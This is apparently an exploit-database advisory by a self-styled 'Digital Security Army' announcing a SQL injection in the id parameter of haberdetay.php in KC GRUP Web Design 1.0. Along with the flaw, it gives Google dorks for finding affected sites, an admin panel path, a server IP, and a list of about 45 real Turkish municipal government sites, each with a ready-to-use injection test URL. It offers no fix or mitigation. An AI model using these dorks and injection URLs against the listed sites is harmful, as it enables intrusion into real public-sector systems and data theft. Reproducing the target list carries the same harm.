################################################################################################# # Exploit Title : KC GRUP Web Design 1.0 SQL Injection # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 03/12/2018 # Vendor Homepage : kcgrup.com ~ kcgrupsms.com # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0 # Exploit Risk : Medium # Google Dorks : intext:''Copyright A(c) 2014-2018 Belediye - TA1/4m haklarA+- saklA+-dA+-r. - Design by KC GRUP'' intext:Design by KC GRUP - Belediye Sitesi site:bel.tr inurl:''/haberdetay.php?id='' intext:Design by KC GRUP'' site:bel.tr # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2260 # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Admin Panel Login Path : panel.kcgrupsms.com ################################################################################################# # SQL Injection Exploit : /haberdetay.php?id=[SQL Injection] ################################################################################################# # Example Vulnerable Sites => Turkish Government Official Municipality WebSites are vulnerable for this security issue. 85.95.249.117 IP Address is vulnerable. [+] guce.bel.tr/haberdetay.php?id=86%27 [+] kofcaz.bel.tr/haberdetay.php?id=86%27 [+] solhan.bel.tr/haberdetay.php?id=86%27 [+] tutak.bel.tr/haberdetay.php?id=86%27 [+] adakli.bel.tr/haberdetay.php?id=86%27 [+] meric.bel.tr/haberdetay.php?id=86%27 [+] karssusuz.bel.tr/haberdetay.php?id=86%27 [+] konuklar.bel.tr/haberdetay.php?id=86%27 [+] mazgirt.bel.tr/haberdetay.php?id=86%27 [+] kofcaz.bel.tr/haberdetay.php?id=86%27 [+] karliova.bel.tr/haberdetay.php?id=86%27 [+] saphane.bel.tr/haberdetay.php?id=86%27 [+] adakli.bel.tr/haberdetay.php?id=86%27 [+] kavakli.bel.tr/haberdetay.php?id=86%27 [+] balikoy.bel.tr/haberdetay.php?id=86%27 [+] duzici.bel.tr/haberdetay.php?id=86%27 [+] pazarlar.bel.tr/haberdetay.php?id=86%27 [+] yozgatdogankent.bel.tr/haberdetay.php?id=86%27 [+] corumortakoy.bel.tr/haberdetay.php?id=86%27 [+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27 [+] deredolu.bel.tr/haberdetay.php?id=86%27 [+] gelendost.bel.tr/haberdetay.php?id=86%27 [+] sutculer.bel.tr/haberdetay.php?id=86%27 [+] akharim.bel.tr/haberdetay.php?id=86%27 [+] kazanci.bel.tr/haberdetay.php?id=86%27 [+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27 [+] halfeli.bel.tr/haberdetay.php?id=86%27 [+] kovanlik.bel.tr/haberdetay.php?id=86%27 [+] sultanhani.bel.tr/haberdetay.php?id=86%27 [+] sambayat.bel.tr/haberdetay.php?id=86%27 [+] meric.bel.tr/haberdetay.php?id=86%27 [+] cimitekke.bel.tr/haberdetay.php?id=86%27 [+] uludere.bel.tr/haberdetay.php?id=86%27 [+] demirkoy.bel.tr/haberdetay.php?id=86%27 [+] bereketli.bel.tr/haberdetay.php?id=86%27 [+] uzgorur.bel.tr/haberdetay.php?id=86%27 [+] akpazar.bel.tr/haberdetay.php?id=86%27 [+] ardanuc.bel.tr/haberdetay.php?id=86%27 [+] guneyyurt.bel.tr/haberdetay.php?id=86%27 [+] olukozu.bel.tr/haberdetay.php?id=86%27 [+] buyukkalecik.bel.tr/haberdetay.php?id=86%27 [+] altinbasak.bel.tr/haberdetay.php?id=86%27 [+] hatipli.bel.tr/haberdetay.php?id=86%27 [+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27 ################################################################################################# # Example SQL Database Error : Warning: Cannot modify header information - headers already sent by (output started at /home/guce/ public_html/baglan.php:7) in /home/guce/public_html/haberdetay.php on line 101 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################